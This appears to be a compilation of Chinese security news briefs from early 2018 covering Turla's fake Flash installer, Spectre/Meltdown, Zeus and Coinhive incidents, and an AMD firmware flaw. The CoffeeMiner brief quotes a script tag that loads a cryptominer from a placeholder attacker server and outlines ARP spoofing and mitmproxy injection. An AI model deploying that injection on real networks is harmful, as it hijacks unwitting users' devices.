ESET 安全团队发现由国家资助的俄罗斯网络间谍组织 Turla 为其网络军械库增添了一款新“武器”，旨在针对 东欧各国使领馆开展攻击活动。据研究人员介绍说，Turla 将其后门与合法的 Flash Player 安装程序捆绑在一起，试图欺骗目标用户安装恶意软件，以便窃取敏感信息。 Turla 组织长期以来一直使用社交工程来引诱目标人群下载和安装伪造的 Adobe Flash Player。但 ESET 近期研究发现，该组织并未局限于以往的攻击工具 ，而是继续开发新型网络攻击武器。 据 ESET 透露 Turla 组织现在不仅将其后门与合法的 Flash Player 安装程序捆绑在一起，而且进一步融合更多可行方式，以确保所使用的 URL 和 IP 地址与 Adobe 的合法基础结构相对应。这样一来，攻击者基本上能够利用 Adobe 诱使用户下载恶意软件，并且使用户相信其下载的软件是来自 Adobe 官方网站（adobe.com）的。 自 2016 年 7 月以来该新工具的攻击活动中有几个与 Turla 组织有关的特征，其中包括该组织创建的后门程序 “ 蚊子”（Mosquito），以及之前与该组织关联使用的IP地址。 除了上述相关特征之外，新工具与 Turla 组织传播的其他恶意软件家族也有相似之处。 攻击媒介 ESET 研究人员提出了几个假设（如下图所示），是关于 Turla 的恶意软件如何应用到用户的计算机上。下图按照图标依次为：① 本地中间人攻击、② 危及网关 、③ ISP 更改流量、④ BGP 劫持、⑤ Adobe 某种威胁，其中 ⑤ 的假想被认为是不太可能成立的。 经过假设以及验证，ESET 研究人员考虑的可能的攻击媒介是： — 受害者组织网络内的一台机器可能被劫持，以便它可以作为本地中间人（MitM）攻击的跳板，这将有效地将目标机器的流量重定向到本地网络上的受感染机器上。 — 攻击者还可能危及组织的网关，使其能够拦截该组织的内部网和互联网之间的所有传入和传出流量。 — 流量拦截也可能发生在互联网服务提供商（ ISP ）的层面上 。 — 攻击者可能使用边界网关协议（BGP）劫持来将流量重新路由到 Turla 控制的服务器，虽然这种策略可能会相当迅速地启动 Adobe 或 BGP 监视服务的警报。 一旦成功安装并启动假 Flash 程序，前面所使用的几个后门则可能被丢弃，如后门 Mosquito ，它是一个 Win32 恶意软件，通过恶意 JavaScript 文件与 Google Apps 脚本上托管的 Web 应用程序通信，或者是从伪造的和不存在的 Adobe URL 下载的未知文件。 然后，这个阶段将被设定为任务的主要目标——过滤敏感数据，包括受感染计算机的唯一 ID、用户名以及安装在设备上的安全产品列表。而用户名和设备名称则会由 Turla 所使用的后门从在 MacOS 上过滤出来。 在这个过程的最后一部分，伪造的安装程序会丢弃随后运行合法的 Flash Player 应用程序以便迷惑用户。后者的安装程序要么嵌入到其伪造的对象中，要么从 Google Drive 网址下载。为了在系统上建立持久性，恶意安装程序还会篡改操作系统的注册表，创建一个允许远程访问的管理帐户。 目前，ESET 的研究人员称已经发现了 Turla 后门 Mosquito 的新样本，不过其代码分析更加困难。 相关阅读： <Turla’s watering hole campaign: An updated Firefox extension abusing Instagram> <Carbon Paper: Peering into Turla’s second stage backdoor> 消息来源：welivesecurity，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

据外媒 1 月 8 日报道， 微软为 Meltdown 、 Spectre 发布的安全更新 Windows KB4056892 对一些 AMD 设备的系统(尤其老款 AMD Athlon 64）产生了负面影响。相关用户向微软上反馈了该影响的具体细节，不过目前尚无确切调查情况以及官方回应。 近期被披露的 Meltdown ( 熔断 ) 和 Spectre（幽灵 ）漏洞给用户和芯片供应商带来很多问题，值得注意的是，AMD 的 cpu 不容易受到 Meltdown 漏洞的影响，但可能会受到 Spectre 的攻击。目前像苹果、思科和微软这些科技巨头承认了其产品问题，并相继推出安全补丁。 然而相关安全专家认为这些修复补丁可能将会对设备的性能产生重大影响。不过这些说法遭到英特尔方面的否认，英特尔证实经过苹果、亚马逊、谷歌和微软的广泛测试，评估了安全更新不会对系统性能产生负面影响。 个别用户声称 Windows 的安全更新 KB4056892 压制使用 AMD （尤其是 Athlon）驱动的电脑，致使系统无法启动，只显示没有动画的 Windows 图标。经过几次失败的启动后执行回滚，还是显示错误 0x800f0845。补丁安装完成后，Athlon 驱动的系统停止工作，但重点是修复程序并没有创建恢复点，以至于甚至在某些情况下都不能恢复回滚。 还有有些用户报告说，即使重新安装 Windows 10 也不能解决问题。 针对这一情况，受影响的用户将需要禁用 Windows Update，但 AMD 用户的尴尬局面最终还是只有微软才能解决。不过微软尚未对该页面上的用户反馈作出任何回应。 后续更新 昨日在微软论坛大量 AMD 用户报告无法进入系统之后，微软正式确认补丁存在兼容性问题，已紧急撤回。 微软官方在支持页面称，他们拿到的用于堵漏 Meltdown 和 Spectre 的 AMD 芯片组技术文件和实际情况不符。目前，微软已经停止了 9 个补丁向 AMD 平台的分发工作（主要是 Win10 的 KB4056892 和 Win7 的 KB4056894 ），正和 AMD 一道联手解决。（cnBeta 消息） 消息来源：Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

据外媒 1 月 6 日报道，开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目，展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。 加密货币的价格上涨使其一直受到网络攻击者的青睐。不久前，黑客就瞄准了星巴克里 “ 蹭网 ” 的笔记本，将其变成了自己的矿机疯狂挖掘门罗币（与比特币类似的一种加密货币）。 Arnau 专家受到了星巴克案件的启发，破解公共 Wi-Fi 网络，将加密挖掘代码注入到连接的浏览会话中，迫使连入 公共 Wi-Fi 网络的所有设备秘密挖掘加密货币。 Arnau 解释了如何在连接的用户访问的 html 页面中为 MITM (中间人)攻击注入一些 javascript ，这样做所有连接到 WiFi 网络的设备都可以强制成为 Arnau 的加密货币。 Arnau 专家分享 CoffeeMiner 攻击方式： 通过欺骗局域网上的地址解析协议（ARP）消息拦截网络上其他设备的未加密传输。 使用 Mitmproxy 将 JavaScript 注入到 Wi-Fi 用户访问的页面中。 为了保证过程简洁，开发人员只注入了一行调用加密货币矿工的代码。 <script src="http://httpserverIP:8000/script.js" type="text/javascript"></script> 然后，通过一个 HTTP 服务器服务该挖掘器。当用户的浏览器加载带有注入代码的页面时，运行 JavaScript 滥用 CPU 时间，并使用 CoinHive 加密挖掘软件挖掘 Monero 。 一旦编译完成，这些元素就会成为一个单独的脚本，可以由攻击者在公共 Wi-Fi 网络上部署。不知情的用户通过由攻击者控制的服务器重新路由，导致其设备在浏览时挖掘加密货币。 目前研究人员发布的 CoffeeMiner 版本尚不支持 HTTPS，但是可以通过添加 sslstrip 来绕过限制。 相关阅读： 研究人员发布的 CoffeeMiner 攻击演示视频  Arnau 在GitHub上发布的 CoffeeMiner 项目代码 消息来源：Security Affairs、Zdnet，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

外媒 1 月 9 日消息， 一位绰号为 “ Rundvleeskroket ” 的 Reddit 用户于 6 日声称黑莓手机官网（blackberrymobile.com）被攻击者利用，通过 Coinhive 货币挖矿工具挖掘 Monero（门罗币） 。根据 Coinhive 的说法该网站遭入侵是因为 Magento 电子商务软件存在安全漏洞。 调查显示，似乎只有全球网站受到 coinhive 挖矿工具的影响，其加拿大、欧盟、美国等地区的用户不在涉及范围内。 Reddit 用户分享的屏幕截图 目前黑莓手机官网已删除了 Coinhive 工具代码，但此类事件愈演愈烈情形不容乐观： 去年 11 月份，专家报告称相同的攻击者加载伪装成假 jQuery 和 Google Analytics JavaScript 文件的恶意脚本，这些文件实际上是 Coinhive 浏览器内加密货币矿工的副本。截至 11 月 22 日，据专家统计共有 1,833 个网站被攻击。 12 月份，Sucuri 的专家发现近 5,500 个 WordPress 网站感染恶意脚本。研究显示该恶意脚本能够记录击键信息，并在访问者的浏览器中加载了一个秘密工作的虚拟货币挖矿工具。同月，星巴克某店 Wifi 被爆遭黑客利用蹭网用户电脑进行挖矿。 Coinhive 工具官方在发现了同一个 Coinhive 帐户被许多其他网站所使用后，对该账户进行了封禁操作。此外，Coinhive 因其服务被滥用向用户表达了歉意。 消息来源：Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

前情回顾：路透社报道 12 月 28 日伊朗突然爆发反政府示威活动，且迅速蔓延至包括德黑兰、马什哈德、哈马丹、沙赫鲁德在内的多个主要城市。反对政府示威浪潮是由对经济困难、物价上涨以及腐败现象的不满所引起，这也是 2009 年以来伊朗爆发的最大规模的抗议活动。 外媒 1 月 7 日消息，网络安全公司称大规模示威之后伊朗 Infy 黑客组织可能会试图网络攻击抗议者以及其国外联络人。目前伊朗当局对抗议者和持不同政见人士的镇压涉及范围较为广泛，其中包括任何与目标群体接触的人员。 据 Palo Alto Networks 的专家介绍伊朗 Infy 黑客组织至少从 2007 年起开始活跃，其恶意软件攻击范围涉及到伊朗国内外。据悉，与伊朗其他针对外国组织的国家资助者不同，Infy 组织似乎集中在反抗者和持不同政见者身上。 Infy 恶意软件于 2007 年 8 月首次被提交到 VirusTotal，同时，有专家发现其最古老的样本中所使用的 C&C 域名与 2004 年 12 月的恶意活动也有关联。不仅如此，研究人员 Colin Anderson 证实自 2014 年年底以来，Infy 攻击者就对伊朗公民社会进行了大量恶意软件攻击事件。多年来，为了不断改进 Infy 恶意软件，其开发作者实施了许多新功能。 相关媒体称针对最近的大规模示威活动，伊朗政府还试图通过屏蔽互联网来隔离抗议活动，例如封锁 Instagram 和 Telegram 等消息服务。 消息来源：Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

据外媒 1 月 6 日报道，黑客滥用乌克兰会计软件开发商 Crystal Finance Millennium （ CFM ）的官方网站散布恶意软件，分发 Zeus 银行木马新变种。Cisco Talos 称该恶意软件通过附加在垃圾邮件上的下载程序获取，且具有一定规模的传播范围。 此次攻击发生于 2017 年 8 月乌克兰独立日假期前后，乌克兰当局和企业接到了当地安全公司 ISSP 的网络攻击警报 ，用来托管恶意软件的一个域名与乌克兰会计软件开发商 CFM 的网站有关。不仅如此，攻击者还利用 CFM 网站传播了 PSCrypt 勒索软件，这是去年针对乌克兰用户的恶意软件。所幸此次攻击黑客没有损害 CFM 的更新服务器，也没有在早前的 Nyetya 协议中看到相同级别的访问。 在这次攻击中，恶意软件负载的电子邮件中包含一个用作恶意软件下载程序的 JavaScript 压缩文件。一旦该文件打开，Javascript 就会被执行，并导致系统检索恶意软件的 playload，运行后 Zeus 银行木马病毒将会感染系统。 思科 Talos 统计：受Zeus银行木马新变种影响的地区 自从 2011 年 Zeus 木马版本 2.0.8.9 的源代码被泄露以来，其他威胁行为者从恶意代码中获得灵感，将其并入多个其他银行木马中。 研究人员发现此次活动发布的恶意软件和 ZeuS 源代码的泄漏版本之间就存在着代码重用： 一旦在系统上执行，恶意软件会执行多个操作来确定它是否在虚拟的沙箱环境中执行。 若恶意软件没有检测到正在沙箱环境中运行的情况下，那么它就会采取措施来在被感染的系统上实现持久性。恶意软件甚至会在受感染的系统上创建一个注册表项，以确保每次重新启动受感染设备时都会执行恶意代码。一旦系统被感染，恶意软件就会尝试去接触不同的命令和控制 ( C&C ) 服务器。 研究人员表示，大多数被恶意软件感染的系统都位于乌克兰和美国，乌克兰交通运输部管辖的 PJSC Ukrtelecom 公司的  ISP 受影响最为严重。影响数量达到 3115 个独立 IP 地址、 11,925,626 个信标显示了这个恶意软件的传播规模。 研究人员称越来越多的攻击者试图滥用受信任的软件制造商，并以此作为在目标环境中获得立足点的一种手段。为了部署更有效的安全控制措施来保护其网络环境，攻击者正在不断改进其攻击方法。 消息来源：IBTimes，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

据外媒 1 月 6 日报道，谷歌专家 Cfir Cohen 发现 AMD 处理器的平台安全处理器（PSP）中的 fTMP 模块存在一个堆栈溢出漏洞，影响 AMD 64 位 x86 的处理器。研究人员透露虽然该漏洞目前尚未得到解决，但是其利用条件也是非常严苛的。 AMD PSP 是内置于主 CPU 芯片上的专用安全处理器，提供类似于英特尔管理引擎的管理功能；Trusted Platform Module（可信平台模块）是安全加密处理器的国际标准，也是专用微控制器，通过将加密密钥集成到设备中来保护硬件；而 fTMP 则是 Trusted Platform Module 的固件实现。 漏洞通过 EK 证书加以利用 安全专家 Cohen 手动静态分析发现函数 EkCheckCurrentCert 中有一个基于堆栈的溢出，该函数通过 TPM2_CreatePrimary 调用用户控制数据（存储在 NV 存储器中的 DE 编码的认证密钥（EK）证书）。Cohen 解释说，TLV（类型长度值）结构被解析并复制到父堆栈帧，但在管理 TLV 结构时特制的 EK 证书缺少边界检查导致了堆栈溢出。因此攻击者可以使用特制的 EK 证书来获得 AMD 安全处理器的远程代码执行权。 漏洞利用条件较为苛刻 Cohen 称利用该漏洞的先决条件是需要进行物理访问，而有关专家专家指出， PSP 并没有实现堆栈 cookies、No-eXecute（NX）标志或地址空间布局随机化（ASLR）等常见的缓解技术。 与此同时， security biz Capsule8 的联合创始人和首席技术官 Dino Dai Zovi 也表示漏洞应该不太受远程执行。 因为使用了该漏洞的证书需要被写入到 NVRAM 中，所以攻击者必须具有主机的特权访问或物理访问权限。 随后 AMD 的发言人向媒体证实该漏洞确实难以被利用：攻击者首先必须访问主板，然后修改 SPI-Flash 才能进行漏洞利用。考虑到这些条件，攻击者可能将会访问受 TPM 保护的信息，比如加密密钥。 目前 AMD 计划在有限数量的固件版本上解决该漏洞，安全更新将在本月晚些时候发布。 相关阅读： AMD 芯片被披露存在安全漏洞 消息来源：The Register、Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

前景提要：2017 年 5 月，美国国土安全部 ( DHS ) 一名员工的家用电脑服务器被发现存有 24.6 万名截至 2014 年底进入 DHS 的员工个人敏感信息。从 2017 年 5 月到 11 月，国土安全部进行了彻底的隐私调查。 据外媒报道，DHS 针对该起事件于 1 月 3 日发表声明称由于国土安全部监察长办公室（OIG）的案件管理系统（CMS）的缺陷，以至于雇员信息遭到泄露。目前事件影响了 DHS 雇用的 24.6 万员工，以及 2002 年至 2014 年与 DHS OIG 调查相关的主体、证人和投诉人的私密信息，其中包括姓名、社会安全号码、出生日期、职位、职级和工作地点。DHS 表示已向受影响的个体发送通知信，并承诺不会再出现类似事件。 DHS 的声明没有透露该前雇员的具体信息，也没有提供调查的进行细节。但 DHS 强调，这一事件并不是由外部恶意行为者发起的网络攻击，受影响的个体信息也不是事件的主要目标。 美国国土安全部首席隐私官 Phillip Kaplan 称 DHS 非常重视为本部员工服务的义务，并致力于保护他们的信息。据悉，所有可能受到影响的个体都获得了 18 个月的免费信用监控和身份保护服务，同时也被要求警惕声称国土安全部的人的可疑电话，以及任何询问敏感信息的人士。 DHS 表示目前正在实施额外的安全防范措施来限制对信息的访问，并将采取严格的检查措施来识别任何不寻常的访问模式。 消息来源：IBTimes，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

据外媒报道 1 月 4 日报道，相关安全专家认为黑客组织即将远程利用影响英特尔 （包括 AMD 和 ARM） 处理器的两个严重漏洞 Spectre （幽灵） 、 Meltdown （熔断）开展攻击行动。 据悉，研究人员于 1 月 3 日披露了漏洞的具体细节：Spectre 和 Meltdown 利用三种不同缺陷绕过内存隔离机制，从而访问敏感数据（包括密码、照片、文档和电子邮件）。目前有数十亿种产品的 CPU 受到影响，其中包括个人电脑和智能手机，此外，云环境也可能会遭受攻击。相关研究人员已提供了一种使用内核页表隔离（ KPTI ）的防御策略，并且受影响的供应商也发布了补丁和解决方法。 虽然主要攻击媒介是通过本地访问（例如目标机器上安装的一个恶意软件），但研究人员认为通过 JavaScript 进行远程攻击也是有可能的。 对此，研究人员开发了一个概念验证（POC），用于验证在 Google 浏览器 上使用 JavaScript 利用 Spectre 的方法 ， 并从其运行过程中读取私有内存。该 PoC 的验证结果显示 JavaScript 远程利用漏洞这一方式是可用的，因此专家认为恶意攻击者远程利用漏洞展开攻击行动只是时间早晚的问题而已。这也就是为什么一些专家建议用户在浏览器中禁用 JavaScript 并安装广告拦截器。 除此之外，几家科技巨头也对可能出现的远程攻击进行了分析。 Mozilla 通过内部实验确定这些技术可以被用来从网页内容读取不同来源之间的私人信息，目前 Mozilla 已决定在 Firefox 57 中实施部分保护。 Google 通过 JavaScript 和 WebAssembly 都可以进行攻击。Google 通知客户，目前版本的 Chrome 包括一个名为站点隔离的功能，可以手动启用以防止攻击。此外，谷歌表示将在 1 月 23 日发布的 Chrome 64 中包含 V8 JavaScript 引擎的缓解措施，其他的强化措施将在未来的版本中加入，但这些措施可能会对性能产生负面影响。 微软 可以通过在浏览器中运行的 JavaScript 代码启动攻击。不过目前微软已经发布了其 Edge 和 IE 浏览器的最新版本，以减少漏洞。 知情人士透露，许多知名公司的高层对黑客即将远程利用漏洞展开攻击行动的这一猜想也表示赞同，例如 FireEye 亚太区首席技术官 Bryce Boland 、Cybereason 公司首席安全官 Sam Curry 等人士。 消息来源：SecurityWeek，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

根据卡巴斯基的案例表明，安全软件可以被情报机构利用来作为一种强大的间谍工具。Digita Security 首席研究官  Patrick Wardle 和前 NSA 黑客通过颠覆卡巴斯基实验室杀毒软件并将其变成强大的机密文档搜索工具来证实了这一点。 Patrick Wardle 在接受纽约时报采访时说： “ 杀毒产品是对抗恶意代码的首选。“  然而，具有讽刺意味的是，这些产品与先进的网络间谍工具有许多共同之处。“从技术角度来看，如果一个反病毒制造商出于某种原因，比如被强迫、被黑客攻击等，是否可以创建一个标记机密文件的签名？ 去年12月，美国总统特朗普 签署了一项法案，禁止在联邦机构使用卡巴斯基实验室产品和服务。根据 Edward J. Snowden 泄漏的一份绝密报告草案显示，NSA 至少自 2008 年就瞄准了杀毒软件（即 Checkpoint 和 Avast ）以便于收集存储在目标机器上的敏感信息。 Wardle 对卡巴斯基实验室杀毒软件进行了逆向工程，以探究是否有可能将其用于情报目的。其目标是希望能够编写一个能够检测机密文件的签名。Wardle 发现代码非常复杂，与传统的防病毒软件不同的是，卡巴斯基的恶意软件签名很容易更新。研究人员认为这个功能可以调整自动扫描受害者的机器和窃取机密文件。 “ 现代反病毒产品是非常复杂的软件，卡巴斯基可能是最复杂的一个。因此，仅仅获得对其签名和扫描逻辑的合理理解是一项具有挑战性的任务。”卡巴斯基的反病毒引擎会定期检查并自动安装任何新的签名。当新的签名可用时，该签名将被卡巴斯基更新服务器的kav守护进程下载。 杀毒软件扫描可能被用于网络间谍活动 Wardle 称官员们通常会将最高机密文件与 “ TS / SCI ” ( “ 最高机密 / 敏感区域信息 ” )进行分类，Wardle  向卡巴斯基的杀毒程序添加了一条规则，用来标记任何包含 “ TS / SCI ” 的文档。为了测试新规则，研究人员在他的电脑上编辑了一个文件，其中包含小熊维尼儿童读物系列的文本，并添加了 “ TS / SC ” 标记。一旦文档被保存到他的机器上，卡巴斯基的防病毒软件就会标记并隔离该文档。 Wardle 测试的后续阶段是发现如何管理被标记的文档，但是反病毒软件将数据发送回公司通过进一步分析发现是正常的。 而卡巴斯基在一份声明中称 Wardle 的研究并不正确，因为卡巴斯基实验室不可能以特定的秘密方式向特定的用户提供特定的签名或更新，所有签名总是公开给所有用户使用而且更新是经过数字签名的，不可能进一步伪造。 但无论如何，Wardle 的研究表明，黑客厂商的平台可以使用杀毒软件作为搜索工具。 专家总结说 ：“然而，任何反病毒公司内部的恶意或有意识的内部人士，如果能够策略性地部署这样的签名，那么在一个可能的情况下任何被强迫或愿意与如政府之类强大机构合作的反病毒公司都同样能够悄悄地利用他们的产品来检测和利用任何感兴趣的文件。” 。 详细报告内容见<All Your Docs Are Belong To Us> 消息来源：Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。